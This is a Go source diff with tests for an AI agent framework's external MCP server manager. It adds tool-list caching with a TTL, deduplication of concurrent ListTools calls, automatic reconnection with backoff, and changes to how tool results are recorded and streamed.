func TestLazySDKClient_MarkDisconnected(t *testing.T) {
c := &lazySDKClient{status: "connected"}
c.inner = &sdkClient{status: "connected"}
c.markDisconnected()
if c.IsConnected() {
t.Fatal("expected disconnected after markDisconnected")
}
if c.GetStatus() != "disconnected" {
t.Fatalf("expected status disconnected, got %s", c.GetStatus())
}
}
func TestHandleConnectionDead_MarksLazyClientDisconnected(t *testing.T) {
logger := zap.NewNop()
m := NewExternalMCPManager(logger)
name := "dead-mcp"
cfg := config.ExternalMCPServerConfig{
Type: "http",
URL: "http://example.com/mcp",
ExternalMCPEnable: true,
}
m.mu.Lock()
m.configs[name] = cfg
client := newLazySDKClient(cfg, logger)
client.inner = &sdkClient{status: "connected"}
client.status = "connected"
m.clients[name] = client
m.mu.Unlock()
deadErr := errors.New(`connection closed: calling "tools/list": client is closing: EOF`)
m.handleConnectionDead(name, client, deadErr)
if client.IsConnected() {
t.Fatal("expected disconnected after handleConnectionDead")
}
if m.GetError(name) == "" {
t.Fatal("expected error message to be recorded")
}
counts := m.GetToolCounts()
if counts[name] != 0 {
t.Fatalf("expected tool count 0 after disconnect, got %d", counts[name])
}
}
func TestReconnectBackoff(t *testing.T) {
t.Parallel()
if d := (&ExternalMCPManager{}).reconnectBackoff(0); d != 0 {
t.Fatalf("attempt 0: got %v", d)
}
if d := (&ExternalMCPManager{}).reconnectBackoff(1); d != externalReconnectMinInterval {
t.Fatalf("attempt 1: got %v", d)
}
if d := (&ExternalMCPManager{}).reconnectBackoff(10); d != externalReconnectMaxBackoff {
t.Fatalf("attempt 10: got %v, want cap %v", d, externalReconnectMaxBackoff)
}
}
func TestTryReconnect_RateLimited(t *testing.T) {
logger := zap.NewNop()
m := NewExternalMCPManager(logger)
name := "rate-limited"
m.reconnectMu.Lock()
m.reconnectLastTry[name] = time.Now()
m.reconnectAttempts[name] = 2
m.reconnectMu.Unlock()
m.tryReconnect(name)
m.reconnectMu.Lock()
attempts := m.reconnectAttempts[name]
m.reconnectMu.Unlock()
if attempts != 2 {
t.Fatalf("rate limited reconnect should not increment attempts, got %d", attempts)
}
}
func TestTryReconnect_SkipsWhenDisabled(t *testing.T) {
logger := zap.NewNop()
m := NewExternalMCPManager(logger)
name := "disabled-mcp"
m.mu.Lock()
m.configs[name] = config.ExternalMCPServerConfig{
Type: "http",
URL: "http://example.com/mcp",
ExternalMCPEnable: false,
}
m.mu.Unlock()
m.tryReconnect(name)
m.reconnectMu.Lock()
attempts := m.reconnectAttempts[name]
m.reconnectMu.Unlock()
if attempts != 0 {
t.Fatalf("disabled MCP should not increment reconnect attempts, got %d", attempts)
}
}
func TestTryReconnect_SkipsWhenConnecting(t *testing.T) {
logger := zap.NewNop()
m := NewExternalMCPManager(logger)
name := "connecting-mcp"
cfg := config.ExternalMCPServerConfig{
Type: "http",
URL: "http://example.com/mcp",
ExternalMCPEnable: true,
}
client := newLazySDKClient(cfg, logger)
client.setStatus("connecting")
m.mu.Lock()
m.configs[name] = cfg
m.clients[name] = client
m.mu.Unlock()
m.tryReconnect(name)
m.reconnectMu.Lock()
attempts := m.reconnectAttempts[name]
m.reconnectMu.Unlock()
if attempts != 0 {
t.Fatalf("connecting MCP should not increment reconnect attempts, got %d", attempts)
}
}
func TestStartClientAutoReconnect_SkipsWhenDisabled(t *testing.T) {
logger := zap.NewNop()
m := NewExternalMCPManager(logger)
m.stopRefresh = make(chan struct{})
name := "stopped"
m.mu.Lock()
m.configs[name] = config.ExternalMCPServerConfig{
Type: "http",
URL: "http://example.com/mcp",
ExternalMCPEnable: false,
}
m.mu.Unlock()
if err := m.startClient(name, true); err != nil {
t.Fatalf("startClient: %v", err)
}
m.mu.RLock()
cfg := m.configs[name]
_, hasClient := m.clients[name]
m.mu.RUnlock()
if cfg.ExternalMCPEnable {
t.Fatal("auto reconnect should not enable stopped MCP")
}
if hasClient {
t.Fatal("auto reconnect should not create client when disabled")
}
}
func TestOnClientConnected_ClearsReconnectState(t *testing.T) {
m := &ExternalMCPManager{
reconnectAttempts: map[string]int{"x": 3},
reconnectLastTry: map[string]time.Time{"x": time.Now()},
reconnecting: map[string]bool{"x": true},
}
m.onClientConnected("x")
m.reconnectMu.Lock()
defer m.reconnectMu.Unlock()
if len(m.reconnectAttempts) != 0 || len(m.reconnectLastTry) != 0 || len(m.reconnecting) != 0 {
t.Fatal("expected reconnect state cleared")
}
}
+217 -76
View File
@@ -15,6 +15,26 @@ import (
"go.uber.org/zap" "go.uber.org/zap"
) )
const (
// externalToolListCacheTTL 已连接外部 MCP 的工具列表缓存有效期,避免每次 API 请求都打远程 ListTools。
externalToolListCacheTTL = 60 * time.Second
// externalToolCountRefreshInterval 后台刷新工具数量的间隔(仅刷新缓存过期或缺失的客户端)。
externalToolCountRefreshInterval = 60 * time.Second
)
// toolListCacheEntry 外部 MCP 工具列表缓存条目
type toolListCacheEntry struct {
tools []Tool
updatedAt time.Time
}
// listToolsInflight 合并同一 MCP 上并发的 ListTools 请求
type listToolsInflight struct {
done chan struct{}
tools []Tool
err error
}
// ExternalMCPManager 外部MCP管理器 // ExternalMCPManager 外部MCP管理器
type ExternalMCPManager struct { type ExternalMCPManager struct {
clients map[string]ExternalMCPClient clients map[string]ExternalMCPClient
@@ -26,14 +46,20 @@ type ExternalMCPManager struct {
errors map[string]string // 错误信息 errors map[string]string // 错误信息
toolCounts map[string]int // 工具数量缓存 toolCounts map[string]int // 工具数量缓存
toolCountsMu sync.RWMutex // 工具数量缓存的锁 toolCountsMu sync.RWMutex // 工具数量缓存的锁
toolCache map[string][]Tool // 工具列表缓存:MCP名称 -> 工具列表 toolCache map[string]toolListCacheEntry // 工具列表缓存:MCP名称 -> 工具列表
toolCacheMu sync.RWMutex // 工具列表缓存的锁 toolCacheMu sync.RWMutex // 工具列表缓存的锁
listToolsMu sync.Mutex
listToolsInflight map[string]*listToolsInflight
stopRefresh chan struct{} // 停止后台刷新的信号 stopRefresh chan struct{} // 停止后台刷新的信号
refreshWg sync.WaitGroup // 等待后台刷新goroutine完成 refreshWg sync.WaitGroup // 等待后台刷新goroutine完成
refreshing atomic.Bool // 防止 refreshToolCounts 并发堆积 refreshing atomic.Bool // 防止 refreshToolCounts 并发堆积
mu sync.RWMutex mu sync.RWMutex
runningCancels map[string]context.CancelFunc runningCancels map[string]context.CancelFunc
abortUserNotes map[string]string abortUserNotes map[string]string
reconnectMu sync.Mutex
reconnecting map[string]bool
reconnectLastTry map[string]time.Time
reconnectAttempts map[string]int
} }
// NewExternalMCPManager 创建外部MCP管理器 // NewExternalMCPManager 创建外部MCP管理器
@@ -51,11 +77,15 @@ func NewExternalMCPManagerWithStorage(logger *zap.Logger, storage MonitorStorage
executions: make(map[string]*ToolExecution), executions: make(map[string]*ToolExecution),
stats: make(map[string]*ToolStats), stats: make(map[string]*ToolStats),
errors: make(map[string]string), errors: make(map[string]string),
toolCounts: make(map[string]int), toolCounts: make(map[string]int),
toolCache: make(map[string][]Tool), toolCache: make(map[string]toolListCacheEntry),
stopRefresh: make(chan struct{}), listToolsInflight: make(map[string]*listToolsInflight),
runningCancels: make(map[string]context.CancelFunc), stopRefresh: make(chan struct{}),
abortUserNotes: make(map[string]string), runningCancels: make(map[string]context.CancelFunc),
abortUserNotes: make(map[string]string),
reconnecting: make(map[string]bool),
reconnectLastTry: make(map[string]time.Time),
reconnectAttempts: make(map[string]int),
} }
// 启动后台刷新工具数量的goroutine // 启动后台刷新工具数量的goroutine
manager.startToolCountRefresh() manager.startToolCountRefresh()
@@ -122,6 +152,7 @@ func (m *ExternalMCPManager) RemoveConfig(name string) error {
} }
delete(m.configs, name) delete(m.configs, name)
m.clearReconnectState(name)
// 清理工具数量缓存 // 清理工具数量缓存
m.toolCountsMu.Lock() m.toolCountsMu.Lock()
@@ -136,8 +167,13 @@ func (m *ExternalMCPManager) RemoveConfig(name string) error {
return nil return nil
} }
// StartClient 启动客户端 // StartClient 启动客户端(用户手动启动;连接失败不自动重试)
func (m *ExternalMCPManager) StartClient(name string) error { func (m *ExternalMCPManager) StartClient(name string) error {
return m.startClient(name, false)
}
// startClient 启动客户端。autoReconnect 为 true 时用于断连自愈:尊重停用状态,失败后按退避继续重试。
func (m *ExternalMCPManager) startClient(name string, autoReconnect bool) error {
m.mu.Lock() m.mu.Lock()
serverCfg, exists := m.configs[name] serverCfg, exists := m.configs[name]
m.mu.Unlock() m.mu.Unlock()
@@ -146,6 +182,10 @@ func (m *ExternalMCPManager) StartClient(name string) error {
return fmt.Errorf("配置不存在: %s", name) return fmt.Errorf("配置不存在: %s", name)
} }
if autoReconnect && !m.isEnabled(serverCfg) {
return nil
}
// 检查是否已经有连接的客户端 // 检查是否已经有连接的客户端
m.mu.RLock() m.mu.RLock()
existingClient, hasClient := m.clients[name] existingClient, hasClient := m.clients[name]
@@ -155,11 +195,12 @@ func (m *ExternalMCPManager) StartClient(name string) error {
// 检查客户端是否已连接 // 检查客户端是否已连接
if existingClient.IsConnected() { if existingClient.IsConnected() {
// 客户端已连接,直接返回成功(目标状态已达成) // 客户端已连接,直接返回成功(目标状态已达成)
// 更新配置为启用(确保配置一致) if !autoReconnect {
m.mu.Lock() m.mu.Lock()
serverCfg.ExternalMCPEnable = true serverCfg.ExternalMCPEnable = true
m.configs[name] = serverCfg m.configs[name] = serverCfg
m.mu.Unlock() m.mu.Unlock()
}
return nil return nil
} }
// 如果有客户端但未连接,先关闭 // 如果有客户端但未连接,先关闭
@@ -169,6 +210,16 @@ func (m *ExternalMCPManager) StartClient(name string) error {
m.mu.Unlock() m.mu.Unlock()
} }
if autoReconnect {
m.mu.RLock()
serverCfg, exists = m.configs[name]
enabled := exists && m.isEnabled(serverCfg)
m.mu.RUnlock()
if !enabled {
return nil
}
}
// 更新配置为启用 // 更新配置为启用
m.mu.Lock() m.mu.Lock()
serverCfg.ExternalMCPEnable = true serverCfg.ExternalMCPEnable = true
@@ -192,10 +243,11 @@ func (m *ExternalMCPManager) StartClient(name string) error {
m.mu.Unlock() m.mu.Unlock()
// 在后台异步进行实际连接 // 在后台异步进行实际连接
go func() { go func(reconnect bool) {
if err := m.doConnect(name, serverCfg, client); err != nil { if err := m.doConnect(name, serverCfg, client); err != nil {
m.logger.Error("连接外部MCP客户端失败", m.logger.Error("连接外部MCP客户端失败",
zap.String("name", name), zap.String("name", name),
zap.Bool("auto_reconnect", reconnect),
zap.Error(err), zap.Error(err),
) )
// 连接失败,设置状态为error并保存错误信息 // 连接失败,设置状态为error并保存错误信息
@@ -205,22 +257,19 @@ func (m *ExternalMCPManager) StartClient(name string) error {
m.mu.Unlock() m.mu.Unlock()
// 触发工具数量刷新(连接失败,工具数量应为0) // 触发工具数量刷新(连接失败,工具数量应为0)
m.triggerToolCountRefresh() m.triggerToolCountRefresh()
if reconnect {
m.scheduleReconnectAfterFailure(name)
}
} else { } else {
// 连接成功,清除错误信息 // 连接成功,清除错误信息
m.mu.Lock() m.mu.Lock()
delete(m.errors, name) delete(m.errors, name)
m.mu.Unlock() m.mu.Unlock()
// 立即刷新工具数量和工具列表缓存 m.onClientConnected(name)
m.triggerToolCountRefresh() // 异步拉取工具列表(singleflight 去重,结果同时写入 toolCache 与 toolCounts
m.refreshToolCache(name, client) go m.refreshToolCache(name, client)
// 2 秒后再刷新一次,覆盖 SSE/Streamable 等需稍等就绪的远端
go func() {
time.Sleep(2 * time.Second)
m.triggerToolCountRefresh()
m.refreshToolCache(name, client)
}()
} }
}() }(autoReconnect)
return nil return nil
} }
@@ -249,10 +298,16 @@ func (m *ExternalMCPManager) StopClient(name string) error {
m.toolCounts[name] = 0 m.toolCounts[name] = 0
m.toolCountsMu.Unlock() m.toolCountsMu.Unlock()
m.toolCacheMu.Lock()
delete(m.toolCache, name)
m.toolCacheMu.Unlock()
// 更新配置为禁用 // 更新配置为禁用
serverCfg.ExternalMCPEnable = false serverCfg.ExternalMCPEnable = false
m.configs[name] = serverCfg m.configs[name] = serverCfg
m.clearReconnectState(name)
return nil return nil
} }
@@ -335,16 +390,19 @@ func (m *ExternalMCPManager) getToolsForClient(name string, client ExternalMCPCl
return nil, fmt.Errorf("外部MCP连接失败: %s", name) return nil, fmt.Errorf("外部MCP连接失败: %s", name)
} }
// 已连接:尝试获取最新工具列表 // 已连接:缓存优先,仅在缺失或过期时打远程 ListTools
if client.IsConnected() { if client.IsConnected() {
tools, err := client.ListTools(ctx) if tools, ok := m.getFreshCachedTools(name); ok {
return tools, nil
}
if tools, ok := m.getAnyCachedTools(name); ok {
m.triggerToolListRefresh(name, client)
return tools, nil
}
tools, err := m.listToolsDeduped(ctx, name, client)
if err != nil { if err != nil {
// 获取失败,尝试使用缓存
return m.getCachedTools(name, "连接正常但获取失败", err) return m.getCachedTools(name, "连接正常但获取失败", err)
} }
// 获取成功,更新缓存
m.updateToolCache(name, tools)
return tools, nil return tools, nil
} }
@@ -361,37 +419,127 @@ func (m *ExternalMCPManager) getToolsForClient(name string, client ExternalMCPCl
return nil, fmt.Errorf("外部MCP状态未知: %s (状态: %s)", name, status) return nil, fmt.Errorf("外部MCP状态未知: %s (状态: %s)", name, status)
} }
// getCachedTools 获取缓存的工具列表 // getCachedTools 获取缓存的工具列表(含空列表缓存)
func (m *ExternalMCPManager) getCachedTools(name, reason string, originalErr error) ([]Tool, error) { func (m *ExternalMCPManager) getCachedTools(name, reason string, originalErr error) ([]Tool, error) {
m.toolCacheMu.RLock() if tools, ok := m.getAnyCachedTools(name); ok {
cachedTools, hasCache := m.toolCache[name]
m.toolCacheMu.RUnlock()
if hasCache && len(cachedTools) > 0 {
m.logger.Debug("使用缓存的工具列表", m.logger.Debug("使用缓存的工具列表",
zap.String("name", name), zap.String("name", name),
zap.String("reason", reason), zap.String("reason", reason),
zap.Int("count", len(cachedTools)), zap.Int("count", len(tools)),
zap.Error(originalErr), zap.Error(originalErr),
) )
return cachedTools, nil return tools, nil
} }
// 无缓存,返回错误
if originalErr != nil { if originalErr != nil {
return nil, fmt.Errorf("获取外部MCP工具失败且无缓存: %w", originalErr) return nil, fmt.Errorf("获取外部MCP工具失败且无缓存: %w", originalErr)
} }
return nil, fmt.Errorf("外部MCP无缓存工具: %s", name) return nil, fmt.Errorf("外部MCP无缓存工具: %s", name)
} }
// updateToolCache 更新工具列表缓存 func (m *ExternalMCPManager) isToolCacheFresh(updatedAt time.Time) bool {
func (m *ExternalMCPManager) updateToolCache(name string, tools []Tool) { return !updatedAt.IsZero() && time.Since(updatedAt) < externalToolListCacheTTL
}
func cloneTools(tools []Tool) []Tool {
if len(tools) == 0 {
return nil
}
out := make([]Tool, len(tools))
copy(out, tools)
return out
}
func (m *ExternalMCPManager) getFreshCachedTools(name string) ([]Tool, bool) {
m.toolCacheMu.RLock()
entry, ok := m.toolCache[name]
m.toolCacheMu.RUnlock()
if !ok || !m.isToolCacheFresh(entry.updatedAt) {
return nil, false
}
return cloneTools(entry.tools), true
}
func (m *ExternalMCPManager) getAnyCachedTools(name string) ([]Tool, bool) {
m.toolCacheMu.RLock()
entry, ok := m.toolCache[name]
m.toolCacheMu.RUnlock()
if !ok {
return nil, false
}
return cloneTools(entry.tools), true
}
// listToolsDeduped 对同一 MCP 合并并发 ListTools,并更新 toolCache / toolCounts。
func (m *ExternalMCPManager) listToolsDeduped(ctx context.Context, name string, client ExternalMCPClient) ([]Tool, error) {
m.listToolsMu.Lock()
if inflight, exists := m.listToolsInflight[name]; exists {
m.listToolsMu.Unlock()
select {
case <-inflight.done:
if inflight.err != nil {
return nil, inflight.err
}
return cloneTools(inflight.tools), nil
case <-ctx.Done():
return nil, ctx.Err()
}
}
inflight := &listToolsInflight{done: make(chan struct{})}
m.listToolsInflight[name] = inflight
m.listToolsMu.Unlock()
inflight.tools, inflight.err = client.ListTools(ctx)
if inflight.err == nil {
m.updateToolCache(name, inflight.tools)
}
m.listToolsMu.Lock()
delete(m.listToolsInflight, name)
close(inflight.done)
m.listToolsMu.Unlock()
if inflight.err != nil {
m.handleConnectionDead(name, client, inflight.err)
return nil, inflight.err
}
return cloneTools(inflight.tools), nil
}
// InvalidateToolCache 清除指定外部 MCP 的工具列表缓存(手动刷新时使用)
func (m *ExternalMCPManager) InvalidateToolCache(name string) {
m.toolCacheMu.Lock() m.toolCacheMu.Lock()
m.toolCache[name] = tools delete(m.toolCache, name)
m.toolCacheMu.Unlock()
}
// InvalidateAllToolCaches 清除所有外部 MCP 工具列表缓存
func (m *ExternalMCPManager) InvalidateAllToolCaches() {
m.toolCacheMu.Lock()
m.toolCache = make(map[string]toolListCacheEntry)
m.toolCacheMu.Unlock()
}
func (m *ExternalMCPManager) triggerToolListRefresh(name string, client ExternalMCPClient) {
go func() {
ctx, cancel := context.WithTimeout(context.Background(), 15*time.Second)
defer cancel()
_, _ = m.listToolsDeduped(ctx, name, client)
}()
}
// updateToolCache 更新工具列表缓存与工具数量
func (m *ExternalMCPManager) updateToolCache(name string, tools []Tool) {
stored := cloneTools(tools)
m.toolCacheMu.Lock()
m.toolCache[name] = toolListCacheEntry{tools: stored, updatedAt: time.Now()}
m.toolCacheMu.Unlock() m.toolCacheMu.Unlock()
// 如果返回空列表,记录警告 m.toolCountsMu.Lock()
if len(tools) == 0 { m.toolCounts[name] = len(stored)
m.toolCountsMu.Unlock()
if len(stored) == 0 {
m.logger.Warn("外部MCP返回空工具列表", m.logger.Warn("外部MCP返回空工具列表",
zap.String("name", name), zap.String("name", name),
zap.String("hint", "服务可能暂时不可用,工具列表为空"), zap.String("hint", "服务可能暂时不可用,工具列表为空"),
@@ -399,7 +547,7 @@ func (m *ExternalMCPManager) updateToolCache(name string, tools []Tool) {
} else { } else {
m.logger.Debug("工具列表缓存已更新", m.logger.Debug("工具列表缓存已更新",
zap.String("name", name), zap.String("name", name),
zap.Int("count", len(tools)), zap.Int("count", len(stored)),
) )
} }
} }
@@ -467,6 +615,9 @@ func (m *ExternalMCPManager) CallTool(ctx context.Context, toolName string, args
// 调用工具 // 调用工具
result, err := client.CallTool(execCtx, actualToolName, args) result, err := client.CallTool(execCtx, actualToolName, args)
if err != nil {
m.handleConnectionDead(mcpName, client, err)
}
cancelledWithUserNote := m.applyAbortUserNoteToCancelledToolResult(executionID, &result, &err) cancelledWithUserNote := m.applyAbortUserNoteToCancelledToolResult(executionID, &result, &err)
// 更新执行记录 // 更新执行记录
@@ -854,28 +1005,27 @@ func (m *ExternalMCPManager) refreshToolCounts() {
return return
} }
// 使用合理的超时时间(15秒),既能应对网络延迟,又不会过长阻塞 // 缓存仍新鲜时直接复用,避免与 GetAllTools 重复打远程
// 由于这是后台异步刷新,超时不会影响前端响应 if _, fresh := m.getFreshCachedTools(n); fresh {
m.toolCountsMu.RLock()
count := m.toolCounts[n]
m.toolCountsMu.RUnlock()
resultChan <- countResult{name: n, count: count}
return
}
ctx, cancel := context.WithTimeout(context.Background(), 15*time.Second) ctx, cancel := context.WithTimeout(context.Background(), 15*time.Second)
tools, err := c.ListTools(ctx) tools, err := m.listToolsDeduped(ctx, n, c)
cancel() cancel()
if err != nil { if err != nil {
errStr := err.Error() if !isConnectionDeadError(err) {
// SSE 连接 EOF:远端可能关闭了流或未按规范在流上推送响应,仅首次用 Warn 提示
if strings.Contains(errStr, "EOF") || strings.Contains(errStr, "client is closing") {
m.logger.Warn("获取外部MCP工具数量失败(SSE 流已关闭或服务端未在流上返回 tools/list 响应)",
zap.String("name", n),
zap.String("hint", "若为 SSE 连接,请确认服务端保持 GET 流打开并按 MCP 规范以 event: message 推送 JSON-RPC 响应"),
zap.Error(err),
)
} else {
m.logger.Warn("获取外部MCP工具数量失败,请检查连接或服务端 tools/list", m.logger.Warn("获取外部MCP工具数量失败,请检查连接或服务端 tools/list",
zap.String("name", n), zap.String("name", n),
zap.Error(err), zap.Error(err),
) )
} }
resultChan <- countResult{name: n, count: -1} // -1 表示使用旧值 resultChan <- countResult{name: n, count: -1}
return return
} }
@@ -925,33 +1075,21 @@ func (m *ExternalMCPManager) refreshToolCache(name string, client ExternalMCPCli
if !client.IsConnected() { if !client.IsConnected() {
return return
} }
if client.GetStatus() == "error" {
// 检查状态,如果是error状态,不更新缓存
status := client.GetStatus()
if status == "error" {
m.logger.Debug("跳过刷新工具列表缓存(连接失败)", m.logger.Debug("跳过刷新工具列表缓存(连接失败)",
zap.String("name", name), zap.String("name", name),
zap.String("status", status),
) )
return return
} }
// 使用较短的超时时间(5秒) ctx, cancel := context.WithTimeout(context.Background(), 15*time.Second)
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
defer cancel() defer cancel()
if _, err := m.listToolsDeduped(ctx, name, client); err != nil {
tools, err := client.ListTools(ctx)
if err != nil {
m.logger.Debug("刷新工具列表缓存失败", m.logger.Debug("刷新工具列表缓存失败",
zap.String("name", name), zap.String("name", name),
zap.Error(err), zap.Error(err),
) )
// 刷新失败时不更新缓存,保留旧缓存(如果有)
return
} }
// 使用统一的缓存更新方法
m.updateToolCache(name, tools)
} }
// startToolCountRefresh 启动后台刷新工具数量的goroutine // startToolCountRefresh 启动后台刷新工具数量的goroutine
@@ -959,7 +1097,7 @@ func (m *ExternalMCPManager) startToolCountRefresh() {
m.refreshWg.Add(1) m.refreshWg.Add(1)
go func() { go func() {
defer m.refreshWg.Done() defer m.refreshWg.Done()
ticker := time.NewTicker(10 * time.Second) // 每10秒刷新一次 ticker := time.NewTicker(externalToolCountRefreshInterval)
defer ticker.Stop() defer ticker.Stop()
// 立即执行一次刷新 // 立即执行一次刷新
@@ -1075,6 +1213,8 @@ func (m *ExternalMCPManager) connectClient(name string, serverCfg config.Externa
zap.String("name", name), zap.String("name", name),
) )
m.onClientConnected(name)
// 连接成功,触发工具数量刷新和工具列表缓存刷新 // 连接成功,触发工具数量刷新和工具列表缓存刷新
m.triggerToolCountRefresh() m.triggerToolCountRefresh()
m.mu.RLock() m.mu.RLock()
@@ -1159,6 +1299,7 @@ func (m *ExternalMCPManager) StopAll() {
for name, client := range m.clients { for name, client := range m.clients {
client.Close() client.Close()
delete(m.clients, name) delete(m.clients, name)
m.clearReconnectState(name)
} }
// 清理所有工具数量缓存 // 清理所有工具数量缓存
@@ -1168,7 +1309,7 @@ func (m *ExternalMCPManager) StopAll() {
// 清理所有工具列表缓存 // 清理所有工具列表缓存
m.toolCacheMu.Lock() m.toolCacheMu.Lock()
m.toolCache = make(map[string][]Tool) m.toolCache = make(map[string]toolListCacheEntry)
m.toolCacheMu.Unlock() m.toolCacheMu.Unlock()
// 停止后台刷新(使用 select 避免重复关闭 channel // 停止后台刷新(使用 select 避免重复关闭 channel
+21
View File
@@ -21,6 +21,7 @@ import (
// MonitorStorage 监控数据存储接口 // MonitorStorage 监控数据存储接口
type MonitorStorage interface { type MonitorStorage interface {
SaveToolExecution(exec *ToolExecution) error SaveToolExecution(exec *ToolExecution) error
UpdateToolExecutionResult(id string, result *ToolResult) error
LoadToolExecutions() ([]*ToolExecution, error) LoadToolExecutions() ([]*ToolExecution, error)
GetToolExecution(id string) (*ToolExecution, error) GetToolExecution(id string) (*ToolExecution, error)
SaveToolStats(toolName string, stats *ToolStats) error SaveToolStats(toolName string, stats *ToolStats) error
@@ -963,6 +964,26 @@ func (s *Server) RecordCompletedToolInvocation(toolName string, args map[string]
return executionID return executionID
} }
// UpdateToolExecutionResult 将监控库中的工具结果更新为送入模型的展示正文(如 reduction 后的 persisted-output)。
func (s *Server) UpdateToolExecutionResult(executionID string, result *ToolResult) error {
if s == nil {
return nil
}
executionID = strings.TrimSpace(executionID)
if executionID == "" || result == nil {
return nil
}
s.mu.Lock()
if exec, ok := s.executions[executionID]; ok && exec != nil {
exec.Result = result
}
s.mu.Unlock()
if s.storage != nil {
return s.storage.UpdateToolExecutionResult(executionID, result)
}
return nil
}
// cleanupOldExecutions 清理旧的执行记录,防止内存无限增长 // cleanupOldExecutions 清理旧的执行记录,防止内存无限增长
func (s *Server) cleanupOldExecutions() { func (s *Server) cleanupOldExecutions() {
if len(s.executions) <= s.maxExecutionsInMemory { if len(s.executions) <= s.maxExecutionsInMemory {
+147 -82
View File
@@ -88,6 +88,7 @@ type einoADKRunLoopArgs struct {
// 在完成时写入 MCP 监控;execute 仍由 eino_execute_monitor 记录,此处跳过。 // 在完成时写入 MCP 监控;execute 仍由 eino_execute_monitor 记录,此处跳过。
FilesystemMonitorAgent *agent.Agent FilesystemMonitorAgent *agent.Agent
FilesystemMonitorRecord einomcp.ExecutionRecorder FilesystemMonitorRecord einomcp.ExecutionRecorder
MCPExecutionBinder *MCPExecutionBinder
// ToolInvokeNotify 与 einomcp.ToolsFromDefinitions 共享:run loop 在迭代前 SetMCP 桥 Fire 以补全 tool_result。 // ToolInvokeNotify 与 einomcp.ToolsFromDefinitions 共享:run loop 在迭代前 SetMCP 桥 Fire 以补全 tool_result。
ToolInvokeNotify *einomcp.ToolInvokeNotifyHolder ToolInvokeNotify *einomcp.ToolInvokeNotifyHolder
@@ -176,6 +177,7 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
lastPlanExecuteExecutor = "" lastPlanExecuteExecutor = ""
var reasoningStreamSeq int64 var reasoningStreamSeq int64
var einoSubReplyStreamSeq int64 var einoSubReplyStreamSeq int64
var mainResponseStreamSeq int64
toolEmitSeen := make(map[string]struct{}) toolEmitSeen := make(map[string]struct{})
var einoMainRound int var einoMainRound int
var einoLastAgent string var einoLastAgent string
@@ -284,53 +286,63 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
executeStdoutDupMu.Unlock() executeStdoutDupMu.Unlock()
} }
var toolResultSent sync.Map // toolCallID -> struct{}ADK Tool 消息去重,避免 bridge 与事件流各推一次 var toolResultSent sync.Map // toolCallID -> struct{}ADK Tool 事件去重(权威正文来自 reduction 处理后的 agent 上下文)
if args.ToolInvokeNotify != nil { tryEmitToolResultProgress := func(toolName, content, toolCallID string, isErr bool, agentName string) {
args.ToolInvokeNotify.Set(func(toolCallID, toolName, einoAgent string, success bool, content string, invokeErr error) { if progress == nil {
tid := strings.TrimSpace(toolCallID) return
removePendingByID(tid) }
if tid == "" || progress == nil { toolName = strings.TrimSpace(toolName)
return if toolName == "" {
toolName = "unknown"
}
preview := content
if len(preview) > 200 {
preview = preview[:200] + "..."
}
data := map[string]interface{}{
"toolName": toolName,
"success": !isErr,
"isError": isErr,
"result": content,
"resultPreview": preview,
"conversationId": conversationID,
"einoAgent": agentName,
"einoRole": einoRoleTag(agentName),
"source": "eino",
}
tid := strings.TrimSpace(toolCallID)
if tid == "" {
if inferred, ok := popNextPendingForAgent(agentName); ok {
tid = inferred.ToolCallID
} else if inferred, ok := popNextPendingForAgent(orchestratorName); ok {
tid = inferred.ToolCallID
} else if inferred, ok := popNextPendingForAgent(""); ok {
tid = inferred.ToolCallID
} else if inferred, ok := popAnyPending(); ok {
tid = inferred.ToolCallID
} }
}
if tid != "" {
removePendingByID(tid)
if _, loaded := toolResultSent.LoadOrStore(tid, struct{}{}); loaded { if _, loaded := toolResultSent.LoadOrStore(tid, struct{}{}); loaded {
return return
} }
isErr := !success || invokeErr != nil data["toolCallId"] = tid
body := content toolCallID = tid
if invokeErr != nil { }
// 保留已流式累计的 stdout(如 execute 超时前的一半输出),避免 tool_result 只剩错误串、模型与 UI 丢失上下文 recordPendingExecuteStdoutDup(toolName, content, isErr)
tail := friendlyEinoExecuteInvokeTail(invokeErr) recordEinoADKFilesystemToolMonitor(args.FilesystemMonitorAgent, args.FilesystemMonitorRecord, toolName, toolCallID, runAccumulatedMsgs, content, isErr)
// execute 流式包装可能已把超时句写入 content(供 ADK tool 与流式 delta);勿重复拼接 if args.FilesystemMonitorAgent != nil && args.MCPExecutionBinder != nil {
if tail != "" && strings.Contains(content, tail) { if execID := args.MCPExecutionBinder.ExecutionID(toolCallID); execID != "" {
body = content args.FilesystemMonitorAgent.UpdateMCPExecutionDisplayResult(execID, content)
} else if strings.TrimSpace(content) != "" {
body = strings.TrimRight(content, "\n") + "\n\n" + tail
} else {
body = tail
}
isErr = true
} }
recordPendingExecuteStdoutDup(toolName, body, isErr) }
preview := body progress("tool_result", fmt.Sprintf("工具结果 (%s)", toolName), data)
if len(preview) > 200 { }
preview = preview[:200] + "..." if args.ToolInvokeNotify != nil {
} args.ToolInvokeNotify.Set(func(toolCallID, toolName, einoAgent string, success bool, content string, invokeErr error) {
agentTag := strings.TrimSpace(einoAgent) removePendingByID(strings.TrimSpace(toolCallID))
if agentTag == "" { // tool_result 仅由下方 ADK schema.Tool 事件推送,正文与送入模型的上下文一致(含 reduction 截断)。
agentTag = orchestratorName
}
progress("tool_result", fmt.Sprintf("工具结果 (%s)", toolName), map[string]interface{}{
"toolName": toolName,
"success": !isErr,
"isError": isErr,
"result": body,
"resultPreview": preview,
"toolCallId": tid,
"conversationId": conversationID,
"einoAgent": agentTag,
"einoRole": einoRoleTag(agentTag),
"source": "eino",
})
}) })
} }
@@ -631,7 +643,52 @@ func runEinoADKAgentLoop(ctx context.Context, args *einoADKRunLoopArgs, baseMsgs
} }
mv := ev.Output.MessageOutput mv := ev.Output.MessageOutput
if mv.IsStreaming && mv.MessageStream != nil && mv.Role == schema.Tool {
toolName := strings.TrimSpace(mv.ToolName)
var toolBuf strings.Builder
streamToolCallID := ""
var toolStreamRecvErr error
for {
chunk, rerr := mv.MessageStream.Recv()
if errors.Is(rerr, io.EOF) {
break
}
if rerr != nil {
toolStreamRecvErr = rerr
break
}
if chunk == nil {
continue
}
if chunk.Content != "" {
toolBuf.WriteString(chunk.Content)
}
if tid := strings.TrimSpace(chunk.ToolCallID); tid != "" {
streamToolCallID = tid
}
}
content := toolBuf.String()
isErr := false
if strings.HasPrefix(content, einomcp.ToolErrorPrefix) {
isErr = true
